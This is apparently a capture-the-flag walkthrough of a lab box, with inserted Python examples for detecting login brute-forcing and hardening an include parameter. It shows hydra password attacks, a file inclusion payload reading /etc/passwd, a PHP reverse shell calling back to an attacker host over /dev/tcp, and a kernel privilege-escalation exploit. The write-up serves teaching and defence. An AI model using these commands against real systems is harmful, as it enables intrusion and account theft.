1. What is Miles password for his emails?

Port Scan

nmap -Pn <ip>

There’re 6 ports: 22, 80, 110, 139, 143, and 445.

High port scan

nmap -Pn -p1000- <ip>

OS and service scan

nmap -p 22,80,110,139,143,445 -A <ip>

There’re 6 services:
OpenSSH 7.2p2 (22),
Apache 2.4.18 (80),
Dovecot pop3d (110),
Samba (139),
Dovecot imap (143),
Samba (445).

Samba scan

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>

There are 2 shares of interest: “anonymous”, which allows anonymous access, and “milesdyson”.

Vulnerability scan

nmap -p 22,80,110,139,143,445 --script vuln <ip>

There is a SquirrelMail instance on the HTTP site.

Access HTTP site

View page source

Trying the search function does nothing.

Let’s access “/squirrelmail”. It’s SquirrelMail version 1.4.23.

Search for exploits

searchsploit squirrelmail 1.4

Not much that I can use.

Further HTTP directory enumeration.

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,sh,cgi

Accessing the other paths: Forbidden!!!

Let’s access the SMB service.

smbclient //<ip>/anonymous
ls

There’re files and directories.

Download all of them

smbget -R smb://<ip>/anonymous

There’re 4 files which are interesting.

Read attention.txt

cat attention.txt

It seems the username may be miles, Miles, or milesdyson.

Read the log file

cd logs
cat log1.txt

This might be some kind of username or password.

Try to brute-force the milesdyson SMB login.

hydra -l milesdyson -P log1.txt 10.10.201.86 smb -V

Failed!!!

Let’s look into SquirrelMail. Maybe I can brute-force it.

Submit some data and intercept the request with Burp Suite.

Copy the POST data and craft the hydra command:

hydra -l <username> -P <password list> <ip> http-post-form "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -V -F -u

Here’s my command.

hydra -l milesdyson -P log1.txt 10.10.201.86 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect." -V -F -u

Now I have the password.
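The hydra run above is very noisy on the server side: one source sends a burst of POSTs to the same login handler. As an added example (not part of the original writeup), the following Python script parses Apache combined-format access log lines (a constructed sample, not logs from the box) and flags any source that POSTs to the login handler at least 10 times within 60 seconds; hydra’s default User-Agent, “Mozilla/5.0 (Hydra)”, is reported as a secondary indicator. The endpoint, threshold and window are assumptions you would tune for your own site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache "combined" log lines (not from the original writeup).
# 10.0.0.9 is a normal user who logs in once; 10.0.0.5 sends a burst of POSTs
# to the SquirrelMail login handler using hydra's default User-Agent.
SAMPLE_LOG = "\n".join(
    ['10.0.0.9 - - [10/Mar/2021:12:00:01 +0000] "GET /squirrelmail/src/login.php HTTP/1.1" 200 1534 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
     '10.0.0.9 - - [10/Mar/2021:12:00:05 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; Linux x86_64)"']
    + ['10.0.0.5 - - [10/Mar/2021:12:01:%02d +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 200 1810 "-" "Mozilla/5.0 (Hydra)"' % s
       for s in range(12)]
)

# Assumed login handler (the one the writeup's hydra command targets).
LOGIN_ENDPOINT = "/squirrelmail/src/redirect.php"

# Apache combined log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect_login_bruteforce(log_text, endpoint=LOGIN_ENDPOINT, threshold=10, window_seconds=60):
    """Return {ip: finding} for every source that sent >= threshold POSTs to
    endpoint inside any window_seconds-long sliding window."""
    posts = defaultdict(list)   # ip -> list of POST timestamps to the endpoint
    agents = defaultdict(set)   # ip -> User-Agent strings seen on those POSTs
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"].split("?", 1)[0] != endpoint:
            continue
        posts[rec["ip"]].append(rec["ts"])
        agents[rec["ip"]].add(rec["ua"])

    window = timedelta(seconds=window_seconds)
    findings = {}
    for ip, stamps in posts.items():
        stamps.sort()
        start, peak = 0, 0
        # Two-pointer sweep: largest number of attempts inside any window.
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            findings[ip] = {
                "attempts_in_window": peak,
                "total_attempts": len(stamps),
                "hydra_user_agent": any("Hydra" in ua for ua in agents[ip]),
            }
    return findings


if __name__ == "__main__":
    for ip, info in detect_login_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info}")
```

The sweep is per source address, so a distributed attempt spread over many addresses would need the same logic keyed on the target username instead; the User-Agent check is only a hint, since the string is trivially changed.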

2. What is the hidden directory?

Let’s use the cracked credentials to log in.

Open every mail. Now I have milesdyson’s SMB password.

There may also be a user “skynet”.

This mail is binary code.

There may also be a user “serenakogen”.

Decode it with CyberChef. Just a string.

Open the last mail. Just a string.

Check the other mail folders. Nothing much.

Let’s log in to milesdyson’s SMB share.

smbclient //<ip>/milesdyson -U milesdyson
ls

Create a directory to download the files into.

mkdir milesdyson
cd milesdyson

Download the files

smbget -R smb://<ip>/milesdyson -U milesdyson

Let’s read this file first.

cd notes
ls

Now I have the hidden directory.

3. What is the vulnerability called when you can include a remote file for malicious purposes?

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.201.86/45kra24zxs28v3yd/ -x php,txt,html,sh,cgi

It’s Cuppa CMS.

View the page source; not useful.

Try brute-forcing with the passwords from log1.txt

hydra -l milesdyson -P log1.txt 10.10.201.86 http-post-form "/45kra24zxs28v3yd/administrator/:user=^USER^&password=^PASS^&task=login:F=Use a valid username and password to gain access to the administrator" -V -F -u

Let’s search for default credentials. I came across this.

Failed!!!

Let’s search for a public exploit

searchsploit cuppa

Copy it

searchsploit -m 25971

Let’s try accessing alertConfigField.php first

Failed!!!

Success!!!

Intercept the request with Burp Suite and send to repeater.

Input:

?urlConfig=../../../../../../../../../etc/passwd

There are 2 users: root and milesdyson.

Let’s get a reverse shell

Prepare the listener

nc -lvp 1234

Prepare a PHP reverse shell and save it as “reverse_shell.php”

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/1234 0>&1'"); ?>

Start an HTTP server to serve the script

python -m SimpleHTTPServer 80

Back to Burp Suite Repeater, input:

?urlConfig=http://<attacker ip>/reverse_shell.php?

Back to listener, now I have a shell.
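Both requests above abuse the same unchecked include parameter: the first walks up the directory tree with `../` (local file inclusion), the second hands the application a remote URL (remote file inclusion). As an added example (not part of the original writeup or of Cuppa CMS), the following Python code shows the unsafe pattern next to a hardened resolver that rejects URL schemes, absolute paths and parent-directory components, then canonicalises the result and confirms it still lies under an allowed base directory. The base directory `/var/www/cuppa/config` and the `.php` allowlist are hypothetical.

```python
import os
from urllib.parse import urlsplit

# Hypothetical directory holding the application's legitimate config snippets.
BASE_DIR = os.path.realpath("/var/www/cuppa/config")


def vulnerable_include_target(url_config):
    """The unsafe pattern behind the writeup's urlConfig requests: the parameter
    is handed straight to the include mechanism, so '../../etc/passwd' and
    'http://host/shell.php' are both accepted verbatim."""
    return url_config


def safe_include_target(url_config, base_dir=BASE_DIR, allowed_ext=(".php",)):
    """Return an absolute path under base_dir, or raise ValueError."""
    if not url_config or "\x00" in url_config:
        raise ValueError("empty or NUL-containing value rejected")
    # 1. Any scheme (http://, ftp://, php://, data:) means remote or wrapper
    #    inclusion; a local config snippet never needs one.
    if urlsplit(url_config).scheme:
        raise ValueError("remote URL or stream wrapper rejected")
    # 2. Normalise separators, then refuse absolute paths and '..' components.
    normalised = url_config.replace("\\", "/")
    if normalised.startswith("/") or ".." in normalised.split("/"):
        raise ValueError("absolute path or traversal component rejected")
    # 3. Defence in depth: canonicalise (resolves symlinks and '.' segments)
    #    and check containment with a path comparison, not a string prefix.
    candidate = os.path.realpath(os.path.join(base_dir, normalised))
    if os.path.commonpath([base_dir, candidate]) != base_dir:
        raise ValueError("resolved path escapes the base directory")
    # 4. Only include files of the expected type.
    if not candidate.endswith(allowed_ext):
        raise ValueError("disallowed file extension")
    return candidate


def check_include_param(url_config, base_dir=BASE_DIR):
    """Convenience wrapper: (True, resolved_path) or (False, rejection reason)."""
    try:
        return True, safe_include_target(url_config, base_dir)
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Constructed inputs mirroring the two payload shapes used above.
    for value in ("site.php",
                  "../../../../../../../../../etc/passwd",
                  "http://203.0.113.5/reverse_shell.php?",
                  "php://filter/resource=site.php",
                  "/etc/passwd"):
        print(f"{value!r:45} vulnerable -> {vulnerable_include_target(value)!r}")
        print(f"{'':45} hardened   -> {check_include_param(value)}")
```

In real deployments the same idea is usually paired with the PHP settings `allow_url_include=Off` and `allow_url_fopen=Off`, so that even a bypass of the application-level check cannot reach a remote file; the resolver here is what stops the local traversal that those settings do not cover.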

Search for user.txt

cd /home
ls
cd milesdyson
ls
cat user.txt

Let’s escalate privileges to root.

Check whether there are any sudo rights.

sudo -l

A password is needed.

Search for SUID binaries

find / -perm -u=s -type f 2>/dev/null

Nothing much.

Let’s find the kernel version

uname -a

Search for exploits

searchsploit linux kernel 4.8.0

Copy it

searchsploit -m 43418

Read it

Upload to /tmp

cd /tmp
wget http://<ip>/43418.c

Compile it

gcc 43418.c -o pwn

Run it

./pwn
id

Now I’m root.

Read root.txt

cd /root
ls
cat root.txt